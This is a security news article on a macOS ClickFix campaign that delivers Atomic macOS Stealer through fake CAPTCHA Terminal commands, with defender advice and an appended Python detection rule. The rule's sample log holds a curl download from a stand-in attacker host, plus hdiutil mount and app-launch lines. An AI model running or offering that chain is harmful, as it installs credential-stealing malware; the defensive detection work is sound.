What happened
A new macOS ClickFix campaign is using fake CAPTCHA pages to trick users into running malicious Terminal commands that silently download, mount, and launch malware from disk image files.
Researchers at Palo Alto Networks Unit 42 found that the campaign infects Mac devices with Atomic macOS Stealer, also known as AMOS. The infostealer is designed to steal browser credentials, cryptocurrency wallet data, Apple Keychain data, messaging app information, and user documents.
The attack begins when a fake CAPTCHA page tells users to open Terminal and paste a command to verify themselves. Once executed, the command downloads a malicious DMG file from an attacker-controlled server, saves it under a random filename, mounts it using macOS’s native hdiutil utility, searches for an application or installer inside the mounted image, and launches it automatically.
This approach combines ClickFix social engineering with silent DMG execution. Previous macOS ClickFix attacks typically required users to manually open downloaded DMG files or execute scripts. In this campaign, the Terminal command handles the download, mount, search, and launch process.
The delivered payload is part of the Atomic macOS Stealer family. The malware displays a fake System Preferences authentication prompt to capture the user’s password.
The stealer targets multiple Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It also targets Firefox-derived browsers, including LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser. The stolen data can include cookies, login databases, autofill information, stored payment cards, and browser profile data.
The malware also searches for cryptocurrency wallet data, including Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper. It also steals Telegram Desktop and Discord data, Apple Notes databases, Safari cookies, Apple Keychain database files, and user documents with PDF, TXT, or RTF extensions.
All harvested data is stored in a ZIP archive and uploaded to the attacker’s server. Researchers also found that the malware can replace legitimate Ledger Live and Trezor Suite installations with malicious versions, likely to support cryptocurrency theft.
Who is affected
Mac users are affected if they encounter the fake CAPTCHA pages and follow instructions to paste commands into Terminal.
The campaign is especially dangerous for users who store browser passwords, session cookies, payment details, cryptocurrency wallet data, Apple Notes content, messaging app data, or sensitive documents on their Mac devices.
Organizations with employees using macOS devices are also exposed. Because the attack relies on social engineering rather than a software vulnerability, it does not depend on an unpatched system: a user who believes they are completing a CAPTCHA verification can unknowingly run a command that installs an infostealer and exfiltrates sensitive data.
Why CISOs should care
This campaign shows how ClickFix tactics are adapting to macOS. Instead of asking users to download and open a file manually, attackers are using Terminal commands that quietly download, mount, and launch malicious DMGs in one flow.
For CISOs, the key risk is that the attack bypasses many assumptions about user intent and software execution. The victim is not simply clicking a suspicious attachment. They are being socially engineered into running a command that uses native macOS utilities to complete the infection chain.
The AMOS payload also creates broad credential and data exposure. Browser credentials, cookies, payment data, Keychain files, messaging data, crypto wallets, and user documents can all support account takeover, financial theft, business email compromise, and follow-on compromise.
The fake System Preferences prompt is another concern because it turns normal macOS trust patterns against users. Once the user enters their password, the malware can capture it and use it to expand access.
3 practical actions
- Warn users never to paste Terminal commands from websites: The attack starts with a fake CAPTCHA page telling users to run a Terminal command. CISOs should train users that CAPTCHA checks, browser fixes, and troubleshooting pages should never require pasting commands into Terminal.
- Monitor macOS endpoints for suspicious DMG mounting and script activity: The campaign uses native macOS tools to download, silently mount, search, and launch malicious disk images. Security teams should alert on unusual Terminal-launched downloads, hdiutil activity, randomly named DMG files in temporary directories, and unexpected application launches from mounted volumes.
- Protect credentials and crypto assets from infostealer exposure: AMOS steals browser data, Keychain files, messaging app data, documents, and cryptocurrency wallet information. Organizations should enforce password managers, phishing-resistant MFA, endpoint detection on macOS, and rapid credential rotation after suspected infostealer infection.
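To make the second action concrete, here is an added example (not from the Unit 42 report or the article) of a simple correlation rule over process telemetry: it flags a terminal-descended session that downloads a DMG into a temporary directory, mounts it with hdiutil, and opens an app from the mounted volume. The log layout, session field, ancestor names and sample lines are all constructed assumptions, not a real EDR schema.

```python
import re
from datetime import datetime

# Assumed regex for disk images written to the temp locations the article describes
TEMP_DMG = re.compile(r"(?:/private)?/(?:tmp|var/folders)/\S+\.dmg", re.I)
TERMINALS = {"Terminal", "iTerm2"}  # assumed ancestor app names; extend for your fleet

# Constructed sample telemetry (not real logs). Assumed layout:
# ts|host|session|ancestor_app|process|cmdline
SAMPLE_EVENTS = """\
2024-01-01T10:00:03|mac-01|s1|Terminal|curl|curl -fsSL https://attacker.example/x -o /tmp/a8f3k2.dmg
2024-01-01T10:00:05|mac-01|s1|Terminal|hdiutil|hdiutil attach -nobrowse -quiet /tmp/a8f3k2.dmg
2024-01-01T10:00:06|mac-01|s1|Terminal|open|open /Volumes/Installer/Installer.app
2024-01-01T11:00:00|mac-02|s2|Finder|hdiutil|hdiutil attach /Users/alice/Downloads/Firefox.dmg
2024-01-01T11:30:00|mac-03|s3|Terminal|hdiutil|hdiutil attach /tmp/build-output.dmg
"""

def classify(process, cmdline):
    """Map one process event to a chain stage, or None if unrelated."""
    if process in ("curl", "wget") and TEMP_DMG.search(cmdline):
        return "download"
    if process == "hdiutil" and "attach" in cmdline and TEMP_DMG.search(cmdline):
        return "mount"
    if process == "open" and re.search(r"/Volumes/\S+\.app", cmdline):
        return "launch"
    return None

def detect_clickfix_dmg_chain(log_text, window_s=120):
    """Alert on terminal sessions that mount a temp-dir DMG and show at least one
    other stage of the download -> mount -> launch chain inside window_s seconds."""
    sessions = {}
    for line in log_text.splitlines():
        ts, host, session, ancestor, process, cmdline = line.split("|", 5)
        if ancestor not in TERMINALS:
            continue  # Finder-driven DMG mounts are normal user behaviour
        stage = classify(process, cmdline)
        if stage:
            sessions.setdefault((host, session), []).append((datetime.fromisoformat(ts), stage))
    alerts = []
    for (host, session), events in sessions.items():
        events.sort()
        stages = [s for _, s in events]
        span = (events[-1][0] - events[0][0]).total_seconds()
        if "mount" in stages and len(set(stages)) >= 2 and span <= window_s:
            severity = "high" if {"download", "mount", "launch"} <= set(stages) else "medium"
            alerts.append({"host": host, "session": session, "severity": severity, "stages": stages})
    return alerts

if __name__ == "__main__":
    for alert in detect_clickfix_dmg_chain(SAMPLE_EVENTS):
        print(alert)
```

A lone hdiutil mount from a terminal (the developer on mac-03) is deliberately not alerted on, so tune the stage threshold to your own false-positive tolerance.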
John Kevin Hao is a news and feature writer covering cybersecurity, technology, and business for professional audiences.

